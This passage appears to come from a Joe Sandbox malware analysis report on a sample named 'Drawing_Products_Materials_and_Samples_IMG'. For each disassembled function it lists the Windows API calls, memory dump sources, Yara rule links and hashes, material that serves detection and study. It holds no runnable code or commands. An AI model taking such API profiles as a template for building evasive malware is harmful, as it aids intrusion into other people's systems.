                                                                                      • Instruction Fuzzy Hash: B8D09E31658301AFEF098F20DE16F2EBBA2EB84B01F10962CB642940E0D6715C15DB16
                                                                                      Function 00405805 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(?,?,0040541D,?,?,00000000,00405600,?,?,?,?), ref: 0040580A
                                                                                      • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040581E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                                                                      • Instruction ID: 3771f6966254d71710a4ae6656988e9437677f6c038d1dffa01ca6e46143e4f7
                                                                                      • Opcode Fuzzy Hash: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                                                                      • Instruction Fuzzy Hash: 84D0C972908120BFC6112728EE0889BBF95DB54271B018B31F969A22F0C7304C628A95
                                                                                      Function 1000279C Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 1000285B
                                                                                      • GetLastError.KERNEL32 ref: 10002962
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocErrorLastVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 497505419-0
                                                                                      • Opcode ID: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                                                                      • Instruction ID: bd365418521e43e453085722f926cc1c0e2ab3e4cffdaddced3e06c5c0338b71
                                                                                      • Opcode Fuzzy Hash: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                                                                      • Instruction Fuzzy Hash: D951A5BA808215DFFB24DF64DCC675937A8EB443D4F22842AE608E722DDF34A950CB55
                                                                                      Function 00402239 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402272
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: 1b535b2f77e26f19bb2a4b73d3ace5ecbe5a17c068042cb8380ef8c757cca308
                                                                                      • Instruction ID: 594037780aef2bbb7222699eae6bef26f59cc054eef20af3a1b4cc0f61f7743a
                                                                                      • Opcode Fuzzy Hash: 1b535b2f77e26f19bb2a4b73d3ace5ecbe5a17c068042cb8380ef8c757cca308
                                                                                      • Instruction Fuzzy Hash: ADE04F32B001E56ADB207AF18ECDD7FA1589B8434CB15017FF601B62C2DDBC2D418AA9
                                                                                      Function 00401705 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401719
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: PathSearch
                                                                                      • String ID:
                                                                                      • API String ID: 2203818243-0
                                                                                      • Opcode ID: 229f9174a99439800e6bd5483d1953b88d06905af260e095f0c906ad75f1f1d1
                                                                                      • Instruction ID: c8b7268d7410949cc8a142cc913c583a62ced303dd91b827a703b53b8233a778
                                                                                      • Opcode Fuzzy Hash: 229f9174a99439800e6bd5483d1953b88d06905af260e095f0c906ad75f1f1d1
                                                                                      • Instruction Fuzzy Hash: 6AE02672304200ABD300DF68DE48AAA779CCB01368F30863BFA01E20C1E2B99940972D
                                                                                      Function 00403072 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EBC,000000FF,?,00000000,00000000,00000000), ref: 00403089
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                                                                      • Instruction ID: 0981d36ce8a37324ca65ea29ac33eec068edb21049201a101882ec42e2df6d76
                                                                                      • Opcode Fuzzy Hash: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                                                                      • Instruction Fuzzy Hash: 3FE08C32151119BBCF205E619C08AEB3B5CEB007A6F00C033BA18E5190D630EB149BA8
                                                                                      Function 00402B11 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNELBASE(00000000,000003E7,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: 4944fcb4b0595bcf744489a17d5e431ec8a9cb0b5ea9cf1e3315565daf770c26
                                                                                      • Instruction ID: 2076060dfd2ee921fe50c9635413a5f0d56a6b8cd73322b3d01e2a4deb0b2e86
                                                                                      • Opcode Fuzzy Hash: 4944fcb4b0595bcf744489a17d5e431ec8a9cb0b5ea9cf1e3315565daf770c26
                                                                                      • Instruction Fuzzy Hash: 39E04F76250108AED700EBA5DD46EA57BDCA704704F008021B608D6091CA78E5508B58
                                                                                      Function 004025E6 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000), ref: 004025F7
                                                                                        • Part of subcall function 00405ADA: wsprintfA.USER32 ref: 00405AE7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      • Opcode ID: bfa30f6df7f7063005ba403da7b46f4a472dab2f3ef42adc61964cf279dd48d1
                                                                                      • Instruction ID: 6da6cc3d53d6ea9ebb59f8823919d91810135f3ca2ec635d41be57e1f8f238b7
                                                                                      • Opcode Fuzzy Hash: bfa30f6df7f7063005ba403da7b46f4a472dab2f3ef42adc61964cf279dd48d1
                                                                                      • Instruction Fuzzy Hash: ABE0863760C1409FC700F7A999C585E77A4DA413253148B7BE111F20D1C6BD84419B2E
                                                                                      Function 100026C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(1000404C,?,?,1000403C), ref: 100026E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                      • Instruction ID: 50d40a96d24def304b4b26cf20c6df658c6444d5d293e09e435d7040471c3010
                                                                                      • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                      • Instruction Fuzzy Hash: 2BF09BF19092A0DEF360DF688CC47063FE4E7983D5B03852AE358F6269EB3445448B19
                                                                                      Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFileAttributesA.KERNELBASE(00000000,?,?), ref: 004015A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: b859a05f267d8f7e24386100397626f1e1324677026db6f8cce1fd414392a42b
                                                                                      • Instruction ID: c88b0ddfb076c9ac8c8172e2ede98752ab09736af03c38ff4908af3a3297ae85
                                                                                      • Opcode Fuzzy Hash: b859a05f267d8f7e24386100397626f1e1324677026db6f8cce1fd414392a42b
                                                                                      • Instruction Fuzzy Hash: 6CD01233B041149BCB00DBA89E4899D77A0DB44325F248637D111F11D1D6BD85416619
                                                                                      Function 00403ED8 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00010406,00000000,00000000,00000000), ref: 00403EEA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                                                                      • Instruction ID: 520eeca43096a233c1d1edcfb324fa3ae1c1311985607c8c229424cb44f36652
                                                                                      • Opcode Fuzzy Hash: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                                                                      • Instruction Fuzzy Hash: 29C04C716442016AEA218B519D49F0777596750701F188425B610A50D1C6B4E410D66D
                                                                                      Function 00403EC1 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,?,00000001,00403CF2), ref: 00403ECF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                                                                      • Instruction ID: 6533290ec96ace9f69d4b5d2bc7ee10b2e44395606cff802ce15a0f50474627a
                                                                                      • Opcode Fuzzy Hash: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                                                                      • Instruction Fuzzy Hash: 99B01235588200BBEE224B00DD0DF457EA2F7A4701F00C024F300240F1C7B200A5DB19
                                                                                      Function 004030A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFA,?), ref: 004030B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
